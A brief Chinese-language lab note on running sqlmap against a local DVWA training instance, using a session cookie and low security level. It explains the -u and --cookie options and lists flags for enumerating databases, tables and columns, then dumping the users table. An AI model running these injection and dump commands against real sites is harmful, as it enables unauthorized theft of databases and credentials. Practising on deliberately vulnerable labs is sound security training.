python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=af36i2m412p2cgn4q2lnkt3d03; security=low"
参数介绍:
-u “要攻击的目标网址”--cookie=“网站cookie值”
查看cookie(告诉sqlmap不用登录,已经登录过了)
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=af36i2m412p2cgn4q2lnkt3d03; security=low" 上面这条命令后面分别添加以下参数后的功能
1、--bds(查看可用的数据库)
2、
-D dvwa --tables
3、
-D dvwa -T users --columns
4、
-D dvwa -T users --dump